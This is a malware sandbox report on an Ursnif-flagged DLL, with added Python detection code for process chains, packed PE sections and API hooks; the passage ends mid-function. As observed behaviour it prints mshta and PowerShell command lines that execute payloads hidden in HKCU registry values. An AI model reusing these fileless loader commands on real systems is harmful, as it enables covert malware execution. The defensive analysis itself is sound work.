            Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: unknown unknown
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.586036318.0000023E99060000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.590796199.000002D199FF0000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
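The process-creation entries above (and the repeated ones under "Suspicious powershell command line found" below) describe the chain the two Sigma hits in this report key on: mshta.exe spawning powershell.exe, PowerShell executing a payload pulled straight out of an HKCU registry value with iex, and that PowerShell driving csc.exe to compile a .cmdline file under %TEMP%. The following is an added detection example, not part of the sandbox report and not the sandbox vendor's code; it parses rows in the report's own "Source: <parent> Process created: <child> <command line>" layout and applies those three rules. The input rows are constructed here from the report's paths; the fifth row (an MSBuild-driven compile from C:\src) is an invented benign control.

```python
import re
from dataclasses import dataclass

# Constructed input: five rows in the layout of the report's "Process created"
# entries (parent, child image, child command line). The first four reuse paths
# and the registry GUID from the report; the fifth is a benign control
# (a build tool compiling from a project directory) that must not fire.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1",
    r"Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'",
    r"Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'",
    r"Source: C:\Program Files (x86)\MSBuild\14.0\Bin\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\src\app\obj\Debug\app.cmdline'",
]

LINE_RE = re.compile(
    r"^Source: (?P<parent>.+?) Process created: (?P<image>.+?\.exe) (?P<cmdline>.*)$",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Directories any user can write to; a compiler input file here is the
# "dot net compiler compiles file from suspicious location" condition.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
# Invoke-Expression over a value read from the registry with gp / Get-ItemProperty.
REG_IEX = re.compile(r"\biex\b.*\b(?:gp|get-itemproperty)\b.*'(HK(?:CU|LM):[^']+)'", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


def parse(lines):
    """Parse report-style 'Process created' rows; rows that do not match are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(ProcEvent(**m.groupdict()))
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, evidence) pairs for the three behaviours the report flags."""
    findings = []
    for ev in events:
        parent, child = basename(ev.parent), basename(ev.image)
        if parent == "mshta.exe" and child in SHELLS:
            findings.append(("mshta_spawns_shell", child))
        if child in ("powershell.exe", "pwsh.exe"):
            m = REG_IEX.search(ev.cmdline)
            if m:
                findings.append(("powershell_iex_registry_payload", m.group(1)))
        if child == "csc.exe":
            m = re.search(r"@'([^']+\.cmdline)'", ev.cmdline, re.IGNORECASE)
            if m and USER_WRITABLE.search(m.group(1)):
                findings.append(("csc_compiles_from_user_writable_path", m.group(1)))
    return findings


if __name__ == "__main__":
    for rule, evidence in detect(parse(SAMPLE_LINES)):
        print(f"{rule}: {evidence}")
```

The registry rule deliberately captures the key path, because that is what an responder needs next: the value under HKCU\Software\AppDataLow\Software\Microsoft\<GUID> is the stage the malware keeps off disk, and exporting it is how you recover the script that csc.exe then compiled.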

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_009B5BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_009B5BD5
Source: u8xtCk7fq8.dll Static PE information: section name: .code
Source: u8xtCk7fq8.dll Static PE information: section name: .rdatat
Source: u8xtCk7fq8.dll Static PE information: section name: .NewIT
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_029544C0 push ebp; mov dword ptr [esp], FFFF0000h 0_2_029544C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_029544C0 push ebp; mov dword ptr [esp], 00000220h 0_2_029544D5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_029511F3 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx 0_2_0295120F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_029511F3 push dword ptr [ebp-10h]; mov dword ptr [esp], edi 0_2_02951215
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_029511F3 push esi; mov dword ptr [esp], 00000003h 0_2_02951260
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_029511F3 push edx; mov dword ptr [esp], 00F00000h 0_2_02951269
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_009D7177 push ecx; ret 0_2_009D7187
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_009D6E10 push ecx; ret 0_2_009D6E19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_044044C0 push ebp; mov dword ptr [esp], FFFF0000h 1_2_044044C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_044044C0 push ebp; mov dword ptr [esp], 00000220h 1_2_044044D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_044011F3 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx 1_2_0440120F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_044011F3 push dword ptr [ebp-10h]; mov dword ptr [esp], edi 1_2_04401215
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_044011F3 push esi; mov dword ptr [esp], 00000003h 1_2_04401260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_044011F3 push edx; mov dword ptr [esp], 00F00000h 1_2_04401269
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00CB7177 push ecx; ret 1_2_00CB7187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00CB1246 push cs; retf 1_2_00CB124B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00CB125E push cs; retf 1_2_00CB125F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00CB127E push cs; retf 1_2_00CB127F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00CB6E10 push ecx; ret 1_2_00CB6E19
Source: initial sample Static PE information: section name: .code entropy: 7.17681778951
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.dll
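The static indicators above (section names .code, .rdatat and .NewIT instead of the linker defaults, and a .code section at entropy 7.18, which is close to the 8.0 of random data) are the classic signs of a packed or encrypted loader. The block below is an added triage example, not part of the report and not the sandbox vendor's code: it computes Shannon entropy per section, flags non-standard names, and also checks the Characteristics flags for sections that are both writable and executable. The section table it runs over is constructed inline (the sample's real sections are not reproduced here); in practice the tuples would come from a PE parser's section headers.

```python
import math
import random
from collections import Counter

# IMAGE_SECTION_HEADER.Characteristics flags (winnt.h).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Section names emitted by common compilers and linkers; anything else is worth a look.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                        ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".textbss"}


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage_sections(sections, entropy_threshold=7.0):
    """sections: iterable of (name, characteristics, raw_bytes) as read from the
    section table. Returns (section_name, reason) findings."""
    findings = []
    for name, chars, raw in sections:
        if name not in COMMON_SECTION_NAMES:
            findings.append((name, "non-standard section name"))
        ent = shannon_entropy(raw)
        if ent >= entropy_threshold:
            findings.append((name, f"high entropy {ent:.2f} (packed or encrypted content)"))
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append((name, "writable and executable (RWX)"))
    return findings


# Constructed section table, not the sample's real one: a plain code section, a
# high-entropy ".code" section standing in for the packed one the report lists
# at entropy 7.18, and an RWX ".NewIT" section.
_rng = random.Random(1234)
SAMPLE_SECTIONS = [
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ,
     b"\x55\x8b\xec" * 200),
    (".code", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ,
     bytes(_rng.getrandbits(8) for _ in range(4096))),
    (".NewIT", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE,
     b"\x00" * 512),
]

if __name__ == "__main__":
    for name, reason in triage_sections(SAMPLE_SECTIONS):
        print(f"{name}: {reason}")
```

A threshold of 7.0 bits per byte catches compressed and encrypted payloads while leaving ordinary x86 code (typically 5.5 to 6.5) alone; a section that trips it and is also executable is the one to dump after the sample has unpacked itself.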

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
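The three hook findings above are the same injected module seen three ways: kernel32's export entry for CreateProcessAsUserW now resolves to 7FFD8893521C, user32's import slot for CreateProcessW points into the same region, and the first bytes of CreateProcessAsUserW itself have been overwritten with a jump. A user-mode scanner detects the inline variant by comparing the live prolog of each exported function against the clean bytes of the same function in a freshly mapped copy of the DLL (after applying relocations), then decoding the redirect and asking whether its destination lies inside the module that should own the function. The block below is an added example of that check, not the sandbox's detection code: the decoder handles the stubs hooking engines usually write (jmp rel32, jmp [rip+disp32] with an adjacent pointer slot, mov rax/jmp rax, push/ret), and the fixture is constructed, with illustrative addresses and clean bytes; only the hook destination 0x7FFD8893521C is taken from the report.

```python
import struct

MASK64 = (1 << 64) - 1


def decode_trampoline(addr: int, code: bytes):
    """Recognise the stubs hooking engines usually write over a prolog, given the
    bytes `code` that live at virtual address `addr`. Returns (stub, target) or
    None when the bytes are not one of the known stubs."""
    if len(code) >= 5 and code[0] == 0xE9:                        # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp rel32", (addr + 5 + rel) & MASK64)
    if len(code) >= 6 and code[0] == 0xFF and code[1] == 0x25:    # jmp qword ptr [rip+disp32]
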